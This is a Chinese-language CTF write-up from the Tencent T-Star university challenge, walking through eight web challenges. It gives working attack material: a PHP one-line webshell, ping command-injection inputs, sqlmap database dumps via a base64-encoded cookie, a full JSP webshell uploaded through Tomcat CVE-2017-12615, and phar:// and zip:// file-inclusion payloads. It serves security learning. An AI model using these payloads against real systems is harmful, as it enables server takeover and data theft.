腾讯T-Star高校挑战赛

0X00前言

以组队形式参加的赛事，一个月前找到了三位好友组团参赛（都是小白啦，包括我）
记录一下赛题~

0X01赛题

一、签到 —— 文件上传js绕过

Upload-labs上的第一题
首先，先上传一个正常.txt或.jpg文件测试是否能够正常上传，结果是可以正常上传。然后，再上传一个已经写好一句话木马的php文件，上传的php文件内容为：<?php eval($_POST['cmd']);?>
此时，有弹窗提示文件类型限制，上传失败。
根据经验，我们开始排查漏洞，先查看网页源代码，在代码尾发现上传文件的类型限制是由前端JavaScript完成。那么只需要在浏览器上禁用前端JavaScript即可。
网页源代码：

禁用之后我们再次上传，此时脚本上传成功。上传成功之后会返回路径，我们可以用菜刀连接shell。在菜刀中添加，输入脚本文件的路径，输入密码cmd，连接成功。
查看网站目录，在www目录下发现key文件，打开即是flag。

二、命令执行基础

DVWA命令执行原题
页面是一个输入IP地址返回ping结果的界面。首先，我们先输入一个IP地址查看返回结果。

如上，发现返回结果是命令行里的直接输出！此时，根据命令执行的基础知识，使用&连接我们执行的命令，例如，输入192.168.44.132&ls -l，尝试命令执行漏洞，结果如下，查询目录成功，接下来遍历目录：
使用命令1&ls …访问上一层目录，此处发现key.php文件：

读取此文件，命令：1 & cat …/key.php，得到flag

三、你能爆破吗——cookie注入

根据题意，使用burp suite爆破。（事先可以使用弱口令登录）
我们先抓包到burp suite，将一下部分发送到intruder进行爆破。
添加爆破的payload admin和pass两个，爆破方式选择Cluster bomb。使用我们自己有的常用用户名和密码字典，分别对用户名和密码爆破。
完整过程比较漫长，但是好在用户名密码比较常见，通过length判断，都是admin，admin 。

我们回到原来页面输出用户密码，返回如下：

刷新界面抓包，抓到的POST包里存在cookie参数，并且发现cookie是经过base64加密的，结合题目提示，尝试对其进行爆破。
将抓到的包保存为txt文件，使用sqlmap工具对cookie参数进行爆破，-p指定参数，–tamper指定脚本，–level指定等级，-dbs爆数据库，代码如下：

python sqlmap.py -r 1.txt -p uname --tamper base64encode.py --level 2 –dbs

发现确实存在注入点，拿到数据库：

排除其他数据库，我们要的应该是security，爆表：

python sqlmap.py -r 1.txt -p uname --tamper base64encode.py --level 2 -D security --tables
python sqlmap.py -r 1.txt -p uname --tamper base64encode.py --level 2 -D security -T flag --columns
python sqlmap.py -r 1.txt -p uname --tamper base64encode.py --level 2 -D security -T flag -C flag --dump

读取出来的flag

四、成绩单

听说又是以前一个赛事的原题
按照界面预输出，我们输入1,2,3，输出回显三个数和一个名字。非常熟悉的sql注入界面了，我们开始在burp suite抓包。
POST包传递id参数：

遇上题类似，我们保存抓包数据到txt文件，使用sqlmap爆破。使用命令爆数据库：

python sqlmap.py -r 2.txt -p id --level 2 --dbs
python sqlmap.py -r 2.txt -p id --level 2 -D web1 --tables
python sqlmap.py -r 2.txt -p id --level 2 -D web1 -T fl4g --columns
python sqlmap.py -r 2.txt -p id --level 2 -D web1 -T fl4g -C flag --dump

成功拿到flag

五、小猫咪踩灯泡

Tomcat（CVE-2017-12615）
payload:测试任意文件上传
利用burpsuite 进行抓包。发送到repeater,修改GET请求为PUT，修改名字shell.jsp,下面添加jsp的shell

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}returnline.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

访问文件，发现上传成功：

执行远程命令,?&pwd=023&cmd=ls

最后执行获取flag命令：?&pwd=023&cmd=cat flag.txt 拿到flag

六、文件上传

经过不断fuzz得出以下过滤

黑名单后缀 + content-type检测 + 内容头部检测 + 内容大小检测
内容敏感字符过滤（可双写绕过）

七、文件包含getshell —— phar://

upload页面只可以上传txt后缀文件

查看lfi.txt，发现可以文件包含

准备一个zip文件，里面是1.php，具体如下，并且重命名为1.txt，然后上传

通过phar://伪协议执行命令
lif.php?file=phar://files/s2afSfGk37Bder1.txt/1&1=phpinfo();
(一般情况下) lif.php?file=phar://files/s2afSfGk37Bder1.txt/1.php&1=phpinfo();
通过zip://伪协议执行命令
lif.php?file=zip://files/s2afSfGk37Bder1.txt#1&1=phpinfo();

拿flag
lif.php?file=phar://files/s2afSfGk37Bder1.txt/1&1=system(‘cat flag.php’);

八、分析代码

是不是联想到7字符或者5字符的文件写入（但是好像我试着不行）

有个猥琐的思路：用cat命令读上一级目录的key
先写入cat文件
.com/?1=>cat
然后看到key是在上层目录
.com/?1=ls …/
然后直接使用cat来读取 * …/*
输入通配符* ，Linux会把第一个列出的cat文件名当作命令，剩下的文件名当作参数。相当于cat …/* 后面的*相当于读取了该目录下所有文件

GOT IT！
收获还是有的。学到了奇葩姿势让自己也猥琐起来

******************************************************